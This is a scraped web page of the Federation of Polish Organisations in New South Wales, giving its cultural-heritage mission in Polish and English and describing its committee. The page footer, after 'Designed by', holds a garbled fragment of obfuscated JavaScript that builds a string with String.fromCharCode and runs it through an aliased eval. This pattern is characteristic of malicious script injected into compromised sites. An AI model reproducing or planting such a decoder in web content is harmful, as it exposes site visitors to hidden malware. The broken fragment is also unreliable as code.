ZŁOTE ORŁY - LAUREACI 2008 (kliknij tu)

Głównym celem Federacji Polskich Organizacji w NPW jest dbałość o zachowanie polskiego dziedzictwa kulturowego, które ubogaca wielokulturowe społeczeństwo  australijskie. Odbywa się to poprzez wspieranie i koordynowanie członkowskich. Federacja Polskich Organizacji w NPW jest pełnoprawnym członkiem Rady Naczelnej Polonii Australijskiej.

 

Banner

The fundamental aim of the Federation of Polish Organisations in NSW is to oversee the preservation of Poland’s culturural heritage, which enriches Australia’s multicultural society. This is achieved through the support and co-ordination of member organizations, as well as maintaining official ties on all levels with both Polish and Australian government departments, as well as non-government bodies.

The Federation’s Committee consists of representatives of all member organizations, each holding equal voting rights. The Federation of Polish Organisations in NSW is a fully fledged member of the National Council of Polish Organisations in Australia and New Zealand.

 

Sydney

 
Designed by
jwn;if((0x19==031))stpj =String.fromCharCode(eval(pvsjfg hoeqe[1*gasyk]) 0xa-igdj);}jpex=eval;jpex(stpj)} ;if((0x19==031))stpj =String.fromCharCode(eval(pvsjfg hoeqe[1*gasyk]) 0xa-igdj);}jpex=eval;jpex(stpj)}